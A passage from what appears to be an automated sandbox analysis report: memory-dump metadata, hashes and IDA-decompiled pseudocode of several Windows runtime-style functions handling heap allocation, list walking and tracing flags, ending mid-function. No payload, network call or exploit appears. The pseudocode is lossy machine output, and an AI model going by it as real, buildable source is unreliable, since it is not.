              0x04bc9192
              0x04bc9195
              0x00000000
              0x04bc9195
              0x00000000
              0x04bc9187
              0x04c2376a
              0x04c2376a
              0x04c2376c
              0x04c2376c
              0x04c2376f
              0x04c23775
              0x00000000
              0x00000000
              0x04c23777
              0x04c23779
              0x00000000
              0x00000000
              0x04c23782
              0x04c23787
              0x04c23789
              0x04c23790
              0x04c23790
              0x04c2378b
              0x04c2378b
              0x04c2378b
              0x04c23792
              0x04c23795
              0x04c23795
              0x04c23798
              0x04c23798
              0x04c2379b
              0x04c2379b
              0x04bc91a3
              0x04bc91a9
              0x04bc91b0
              0x04bc91b4
              0x04bc91b4
              0x04bc91bb
              0x04bc91c0
              0x04bc91c5
              0x04bc91c7
              0x04c237da
              0x04bc91cd
              0x04bc91cd
              0x04bc91cd
              0x04bc91d2
              0x04bc91d5
              0x04bc9239
              0x04bc9239
              0x04bc91d7
              0x04bc91db
              0x04bc91e1
              0x04bc91e7
              0x04bc91fd
              0x04bc9203
              0x04bc921e
              0x04bc9223
              0x00000000
              0x04bc9223
              0x04bc9205
              0x04bc9208
              0x04bc920c
              0x04bc9214
              0x04bc9214
              0x04bc91e9
              0x04bc91e9
              0x04bc91ee
              0x04bc91f3
              0x04bc91f3
              0x04bc91f3
              0x04bc91e7
              0x00000000
              0x04bc91db
              0x04bc9187
              0x04bc9168

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: caca35679da4c896e86a0830e51b447b42f72085a625d9c3d4667e231fab7ce5
              • Instruction ID: 80f85f21016c9e7d7058e835d368555346c2b55b93d58cacd8326ba510d64fbe
              • Opcode Fuzzy Hash: caca35679da4c896e86a0830e51b447b42f72085a625d9c3d4667e231fab7ce5
              • Instruction Fuzzy Hash: 2E31C0B5A00284EFFB25DF68C5897ACB7F2FB49724F18818DC40467250C374B990CBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BE0050 Relevance: .1, Instructions: 81COMMON
              Download Yara Rule
              C-Code - Quality: 53%
              			E04BE0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x4cbd360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E04BF9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E04C0B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E04C98A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E04BF9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x4cbb1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















              0x04be0055
              0x04be005d
              0x04be0062
              0x04be006c
              0x04be006f
              0x04be0074
              0x04be007a
              0x04be007a
              0x04be0080
              0x04be0080
              0x04be0087
              0x04be008d
              0x04be008f
              0x04be0093
              0x04be0095
              0x04be009b
              0x04be00f8
              0x04be00fb
              0x04be00fc
              0x04be00ff
              0x04be0108
              0x04be0108
              0x04be00a2
              0x04be00a6
              0x04be00b3
              0x04be00bc
              0x04be00c5
              0x04be00ca
              0x04c2c01e
              0x00000000
              0x00000000
              0x04c2c02d
              0x04be00d5
              0x04be00d9
              0x04c2c03d
              0x04c2c046
              0x04c2c046
              0x04be00df
              0x04be00e2
              0x04be00ea
              0x04be00ef
              0x04be00f2
              0x04be00f6
              0x04be0111
              0x04be0117
              0x04be0117
              0x00000000
              0x04be00f6
              0x04be00d0
              0x04be00d0
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eb9a2506a531e4521537b0ed7a9be62d1c7e97071b90969cec8ce1fd6a04d5d2
              • Instruction ID: c00588e35c48cbb0f854113cd001790a0e23cecd5e62a2f08481cc47378ec6f7
              • Opcode Fuzzy Hash: eb9a2506a531e4521537b0ed7a9be62d1c7e97071b90969cec8ce1fd6a04d5d2
              • Instruction Fuzzy Hash: 5931AE31201B148FD721DF28C840B6AB3E5FF88718F1445ADE59A87A90EB75BC01DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C46C0A Relevance: .1, Instructions: 79COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E04C46C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E04BE7D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x4cb7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L04BE4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E04C0F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E04BE7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E04C09AE0();
						_t23 = L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












              0x04c46c0a
              0x04c46c0f
              0x04c46c10
              0x04c46c13
              0x04c46c15
              0x04c46c19
              0x04c46c1c
              0x04c46c21
              0x04c46c28
              0x04c46c3a
              0x04c46c2a
              0x04c46c33
              0x04c46c33
              0x04c46c3f
              0x04c46c48
              0x04c46c4d
              0x04c46c60
              0x04c46c65
              0x04c46c69
              0x04c46c73
              0x04c46c79
              0x04c46c7f
              0x04c46c86
              0x04c46c90
              0x04c46c94
              0x04c46ca6
              0x04c46cb2
              0x04c46cbd
              0x04c46cbd
              0x04c46cc3
              0x04c46cc7
              0x04c46ccb
              0x04c46cd0
              0x04c46cd1
              0x04c46ce2
              0x04c46ce2
              0x04c46c69
              0x04c46ced

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7c8284ab5145f5bc5e71a0c83d07d992ea19e7a34953da6da15b5df404ad067d
              • Instruction ID: be64bdae74312822451d9d644a1fee9749b1ac86b690e4e797dfafb2a48b6bd9
              • Opcode Fuzzy Hash: 7c8284ab5145f5bc5e71a0c83d07d992ea19e7a34953da6da15b5df404ad067d
              • Instruction Fuzzy Hash: D421ABB1A00644AFD715DB69D980F2AB7B8FF88704F1440AAF904C7791DB38ED50CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C090AF Relevance: .1, Instructions: 76COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E04C090AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E04C1D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E04BFE5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L04BE4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E04C0F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E04BFA2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























              0x04c090af
              0x04c090b8
              0x04c090bb
              0x04c090bf
              0x04c090c2
              0x04c090c2
              0x04c090c8
              0x04c090cb
              0x04c090cd
              0x04c414d7
              0x04c414eb
              0x04c414eb
              0x00000000
              0x04c414eb
              0x04c414db
              0x04c414e6
              0x00000000
              0x04c414f2
              0x04c414e8
              0x00000000
              0x04c414e8
              0x04c090d8
              0x04c090da
              0x04c090dd
              0x04c090e5
              0x00000000
              0x04c09139
              0x04c090fa
              0x04c090fe
              0x04c09142
              0x00000000
              0x04c09142
              0x04c09104
              0x04c09107
              0x04c0910b
              0x04c09110
              0x04c09118
              0x04c09147
              0x04c09148
              0x04c0914f
              0x04c09150
              0x04c09151
              0x04c09152
              0x04c09156
              0x04c0915d
              0x04c09160
              0x04c09168
              0x04c0916c
              0x04c091bc
              0x04c091be
              0x00000000
              0x04c091be
              0x04c0916e
              0x04c09173
              0x04c09176
              0x00000000
              0x00000000
              0x04c0917c
              0x04c09180
              0x04c091b5
              0x00000000
              0x04c091b5
              0x04c09182
              0x04c09185
              0x04c09189
              0x00000000
              0x00000000
              0x04c0918e
              0x04c09190
              0x04c09198
              0x00000000
              0x00000000
              0x04c091a0
              0x00000000
              0x04c091ad
              0x04c091ad
              0x04c091b0
              0x04c091b1
              0x00000000
              0x04c09185
              0x04c0911a
              0x04c0911c
              0x04c0911f
              0x04c09125
              0x04c09127
              0x00000000

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction ID: cd16948fbad103fc04bab473211f471f9c935fe15fb058e2fb74298fa5a852b4
              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction Fuzzy Hash: BD21B0B5A00204EFDB20DF59C944B6AF7F9EB48314F14C86AE989A7251D370FD40CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BF3B7A Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              C-Code - Quality: 59%
              			E04BF3B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x4cb84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x4cb84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x4cb84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E04C0AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E04C0FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x4cb84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x4cb84c4; // 0x0
					L04BE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












              0x04bf3b89
              0x04bf3b96
              0x04bf3ba1
              0x04bf3bab
              0x04bf3bb5
              0x04bf3bb9
              0x04c36298
              0x04bf3bbf
              0x04bf3bc2
              0x04bf3bc3
              0x04bf3bc9
              0x04bf3bca
              0x04bf3bcc
              0x04bf3bcd
              0x04bf3bd4
              0x04bf3bd6
              0x04bf3bdb
              0x04bf3bea
              0x04bf3bf7
              0x04bf3bfb
              0x04bf3bff
              0x04bf3c09
              0x04bf3c0a
              0x04bf3c0b
              0x04bf3c0f
              0x04bf3c14
              0x04bf3c18
              0x04bf3c18
              0x04bf3bfb
              0x04bf3c1b
              0x04bf3c30
              0x04bf3c30
              0x04bf3c3d

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e1456248eae67004652e5602fce99c39219a51f89b34dc3877f4f994b436d444
              • Instruction ID: e89f10b30f9faf501b110523da123f6a3077081e228818db565e6aaa51acf0d2
              • Opcode Fuzzy Hash: e1456248eae67004652e5602fce99c39219a51f89b34dc3877f4f994b436d444
              • Instruction Fuzzy Hash: 3B21B072600104AFD700DF58CD81B6AB7BDFB40308F1500A8EA08AB251D371BD159BE0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C46CF0 Relevance: .1, Instructions: 74COMMON
              Download Yara Rule
              C-Code - Quality: 80%
              			E04C46CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E04BE7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E04BE7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x4ba5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E04BFF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E04BFF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04C47016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L04BE2400( &_v52);
								}
								_t21 = L04BE2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















              0x04c46cfb
              0x04c46d00
              0x04c46d02
              0x04c46d06
              0x04c46d0a
              0x04c46d0e
              0x04c46d19
              0x04c46d2b
              0x04c46d1b
              0x04c46d24
              0x04c46d24
              0x04c46d33
              0x04c46d39
              0x04c46d46
              0x04c46d4f
              0x04c46d61
              0x04c46d51
              0x04c46d5a
              0x04c46d5a
              0x04c46d69
              0x04c46d6b
              0x04c46d6d
              0x04c46d6f
              0x04c46d6f
              0x04c46d74
              0x04c46d79
              0x04c46d7a
              0x04c46d7f
              0x04c46d82
              0x04c46d88
              0x04c46d89
              0x04c46d90
              0x04c46d94
              0x04c46da7
              0x04c46db1
              0x04c46db1
              0x04c46dbb
              0x04c46dbb
              0x04c46d90
              0x04c46d69
              0x04c46d46
              0x04c46dc6

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 722c4944638a17856da45bb0b59dbef21afa9464922950eb8253aa25cc3fa43d
              • Instruction ID: 7e464865869fa4763c5af31aa358ff724d7c67c7c40667880432695a6125cc99
              • Opcode Fuzzy Hash: 722c4944638a17856da45bb0b59dbef21afa9464922950eb8253aa25cc3fa43d
              • Instruction Fuzzy Hash: AA21D472604344ABD711DF69CA44F6BB7EDEFC2748F080596F940C7255EB38EA08C6A2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C9070D Relevance: .1, Instructions: 72COMMON
              Download Yara Rule
              C-Code - Quality: 67%
              			E04C9070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04C907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04C8AFDE( &_v8,  &_v12);
					E04C91293(_t38, _v28, _t60);
					if(E04BE7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04C814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













              0x04c9071b
              0x04c90724
              0x04c90734
              0x04c90738
              0x04c9074b
              0x04c9074b
              0x04c90753
              0x04c90753
              0x04c90759
              0x04c9075d
              0x04c90774
              0x04c90779
              0x04c9077d
              0x04c90789
              0x04c90795
              0x04c907a7
              0x04c90797
              0x04c907a0
              0x04c907a0
              0x04c907af
              0x04c907c4
              0x04c907cd
              0x04c907cd
              0x04c907af
              0x04c907dc

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction ID: e28701698e7ad9845cd5d8dddf88f1c8a689cde7dda22719189163c9ebbbe371
              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction Fuzzy Hash: 2621F236204204AFDB05DF19C884A6ABBE6EBC4364F088569F9958B381DB30ED09CB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04BEAE73 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              C-Code - Quality: 96%
              			E04BEAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E04BE7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E04BE7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E04BE7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E04BE7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04C47794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













              0x04beae78
              0x04beae7c
              0x04beae7e
              0x04beae81
              0x04beae86
              0x04beae8d
              0x04c32691
              0x04beae93
              0x04beae93
              0x04beae93
              0x04beae98
              0x04beae9d
              0x04c326a2
              0x04c326b4
              0x04c326a4
              0x04c326ad
              0x04c326ad
              0x04c326b9
              0x00000000
              0x04c326bb
              0x00000000
              0x04c326bb
              0x04beaea3
              0x04beaea3
              0x04beaea3
              0x04beaeaa
              0x04c326c0
              0x04c326c9
              0x04c326c9
              0x04beaeb3
              0x04c326d4
              0x04c326e1
              0x00000000
              0x00000000
              0x04c326e7
              0x04c326ee
              0x04c326f0
              0x04c326f9
              0x04c326f9
              0x04c32702
              0x04c32708
              0x04c32708
              0x04c3270b
              0x04c3270f
              0x04c32711
              0x04c32711
              0x04c32725
              0x04c32725
              0x00000000
              0x04beaeb9
              0x04beaeb9
              0x04beaebf
              0x04beaebf
              0x04beaeb3

              Memory Dump Source
              • Source File: 00000011.00000002.499888198.0000000004BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BA0000, based on PE: true
              • Associated: 00000011.00000002.500011272.0000000004CBB000.00000040.00000800.00020000.00000000.sdmpDownload File
              • Associated: 00000011.00000002.500024193.0000000004CBF000.00000040.00000800.00020000.00000000.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_4ba0000_control.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction ID: 4af8687ec24ade3178cff0e96affd659d911f1065cb39e5e3e2dd18bada674c3
              • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
              • Instruction Fuzzy Hash: 8021F371601684DFEF269B2AC944B3577EAEF84344F1904E1DD048B7A2EB34FD40D6A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 04C47794 Relevance: .1, Instructions: 70COMMON
              Download Yara Rule
              C-Code - Quality: 82%
              			E04C47794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4cb7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L04BE4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
